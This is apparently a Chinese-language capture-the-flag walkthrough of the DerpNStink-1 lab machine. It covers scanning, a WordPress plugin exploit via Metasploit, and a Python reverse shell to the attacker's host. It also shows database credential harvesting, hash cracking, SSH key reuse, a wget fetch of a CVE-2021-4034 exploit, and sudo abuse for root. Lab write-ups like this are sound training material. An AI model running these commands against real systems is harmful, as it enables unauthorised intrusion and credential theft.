DERPNSTINK-1 渗透测试实战教学文档<\/h1>

1. 环境准备与信息收集<\/h2>

1.1 环境配置<\/h3>

攻击机<\/strong>: Kali Linux<\/li>
目标机<\/strong>: VMware虚拟机 (IP: 192.168.111.139)<\/li>

网络扫描<\/strong>: 使用Nmap进行主机发现和端口扫描<\/li> <\/ul>
# 扫描整个网段发现目标主机<\/span> <\/span><\/span>nmap -sP 192.168.111.0\/24 <\/span><\/span> <\/span><\/span># 扫描目标主机全端口<\/span> <\/span><\/span>nmap 192.168.111.139 -p- -sS -sV -A -T5 <\/span><\/span><\/code><\/pre>1.2 初始信息收集<\/h3> 通过curl进行POST请求获取第一个flag:<\/li> <\/ul> curl -X POST http:\/\/192.168.111.139\/webnotes\/info.txt <\/span><\/span><\/code><\/pre>Flag1<\/strong>: 52E37291AEDF6A46D7D0BB8A6312F4F9F1AA4975C248C3F0E008CBA09D6E9166<\/p> 发现DNS提示信息，更新本地hosts文件:<\/li> <\/ul> echo "192.168.111.139 derpnstink.local"<\/span> >> \/etc\/hosts <\/span><\/span><\/code><\/pre>2. Web应用渗透<\/h2> 2.1 目录枚举<\/h3> 使用dirb进行目录爆破:<\/p> dirb http:\/\/derpnstink.local\/ <\/span><\/span><\/code><\/pre>发现WordPress后台: http:\/\/192.168.111.139\/weblog\/wp-admin\/<\/code><\/p> 2.2 WordPress渗透<\/h3> 弱口令登录<\/strong>: admin\/admin<\/li> WPScan扫描<\/strong>:<\/li> <\/ul> wpscan --url http:\/\/derpnstink.local\/weblog <\/span><\/span><\/code><\/pre>发现Slideshow Gallery插件存在漏洞<\/p> 2.3 利用插件漏洞<\/h3> 使用Metasploit框架:<\/p> msfconsole <\/span><\/span>search Slideshow Gallery <\/span><\/span>use exploit\/unix\/webapp\/wp_slideshowgallery_upload <\/span><\/span>set rhosts 192.168.111.139 <\/span><\/span>set targeturi \/weblog <\/span><\/span>set wp_user admin <\/span><\/span>set wp_password admin <\/span><\/span>run <\/span><\/span><\/code><\/pre>2.4 获取稳定shell<\/h3> # 攻击机监听<\/span> <\/span><\/span>nc -vlp 6677<\/span> <\/span><\/span> <\/span><\/span># 目标机反弹shell<\/span> <\/span><\/span>python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("攻击机IP",6677));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["\/bin\/sh","-i"]);'<\/span> <\/span><\/span> <\/span><\/span># 升级为交互式shell<\/span> <\/span><\/span>python -c 'import pty; pty.spawn("\/bin\/bash")'<\/span> <\/span><\/span><\/code><\/pre>3. 数据库信息收集<\/h2> 3.1 获取数据库凭据<\/h3> grep "root"<\/span> -rn \/var\/www\/html\/weblog\/wp-config.php <\/span><\/span><\/code><\/pre>获得数据库凭据: root\/mysql<\/p> 3.2 数据库枚举<\/h3> mysql -u root -p <\/span><\/span># 密码: mysql<\/span> <\/span><\/span> <\/span><\/span>show databases; <\/span><\/span>use wordpress_db; <\/span><\/span>show tables; <\/span><\/span>select<\/span> * from wp_users; <\/span><\/span><\/code><\/pre>发现用户unclestinky及其密码哈希: $P$BW6NTkFvboVVCHU2R9qmNai1WfHSC41<\/code><\/p> 3.3 密码破解<\/h3> echo '$P$BW6NTkFvboVVCHU2R9qmNai1WfHSC41'<\/span> > hash.txt <\/span><\/span>john hash.txt --wordlist=<\/span>\/usr\/share\/wordlists\/rockyou.txt <\/span><\/span><\/code><\/pre>破解结果<\/strong>: wedgie57<\/p> 3.4 获取Flag2<\/h3> 使用unclestinky\/wedgie57登录WordPress获取: Flag2<\/strong>: a7d355b26bda6bf1196ccffead0b2cf2b81f0a9de5b4876b44407f1dc07e51e6<\/p> 4. FTP服务渗透<\/h2> 4.1 FTP登录<\/h3> 使用浏览器或命令行访问: ftp:\/\/192.168.111.139\/<\/code> 凭据: stinky\/wedgie57<\/p> 4.2 发现SSH私钥<\/h3> 在目录\/files\/ssh\/ssh\/ssh\/ssh\/ssh\/ssh\/ssh\/<\/code>下找到key.txt文件:<\/p> -----BEGIN RSA PRIVATE KEY----- MIIEowIBAAKCAQEAwSaN1OE76mjt64fOpAbKnFyikjz4yV8qYUxki+MjiRPqtDo4 [...] -----END RSA PRIVATE KEY----- <\/code><\/pre> 4.3 使用SSH私钥登录<\/h3> chmod 400<\/span> key.txt <\/span><\/span>ssh -i key.txt stinky@192.168.111.139 <\/span><\/span><\/code><\/pre>Flag3<\/strong>: 07f62b021771d3cf67e2e1faf18769cc5e5c119ad7d4d1847a11e11d6d5a7ecb<\/p> 5. 权限提升<\/h2> 5.1 方法一: CVE-2021-4034提权<\/h3> 下载并编译exp:<\/li> <\/ol> wget http:\/\/攻击机IP:8082\/exp.c -O cve-2021-4034-poc.c <\/span><\/span>gcc cve-2021-4034-poc.c -o exp <\/span><\/span>chmod +x exp <\/span><\/span>.\/exp <\/span><\/span><\/code><\/pre>5.2 方法二: 流量分析提权<\/h3> 分析\/home\/stinky\/Documents\/derpissues.pcap<\/code>文件:<\/li> <\/ol> # 将文件传输到攻击机<\/span> <\/span><\/span>nc -l -p 8888<\/span> > derp.pcap # 攻击机<\/span> <\/span><\/span>nc 攻击机IP 8888<\/span> < derpissues.pcap # 目标机<\/span> <\/span><\/span> <\/span><\/span># 使用Wireshark分析<\/span> <\/span><\/span>wireshark derp.pcap <\/span><\/span><\/code><\/pre> 过滤发现凭证:<\/li> <\/ol> log=mrderp&pwd=derpderpderpderpderpderpderp <\/code><\/pre> 提权操作:<\/li> <\/ol> su mrderp <\/span><\/span>密码: derpderpderpderpderpderpderp <\/span><\/span> <\/span><\/span>sudo -l # 发现可以执行\/home\/mrderp\/binaries\/derpy*<\/span> <\/span><\/span> <\/span><\/span># 创建恶意脚本<\/span> <\/span><\/span>echo '#!\/bin\/bash'<\/span> > derpy.sh <\/span><\/span>echo 'bash -i'<\/span> >> derpy.sh <\/span><\/span>chmod +x derpy.sh <\/span><\/span> <\/span><\/span># 执行提权<\/span> <\/span><\/span>sudo .\/derpy.sh <\/span><\/span><\/code><\/pre>5.3 获取Flag4<\/h3> Flag4<\/strong>: 49dca65f362fee401292ed7ada96f96295eab1e589c52e4e66bf4aedda715fdd<\/p> 6. 总结<\/h2> 本次渗透测试涉及的技术点:<\/p> 基础信息收集(Nmap, curl)<\/li> Web目录枚举(dirb)<\/li> WordPress漏洞利用(WPScan, Metasploit)<\/li> 数据库信息收集与密码破解(John the Ripper)<\/li> SSH私钥利用<\/li> 流量分析(Wireshark)<\/li> 本地提权(CVE-2021-4034, sudo配置不当)<\/li> <\/ol> 所有技术仅用于合法授权测试和教育目的。<\/p>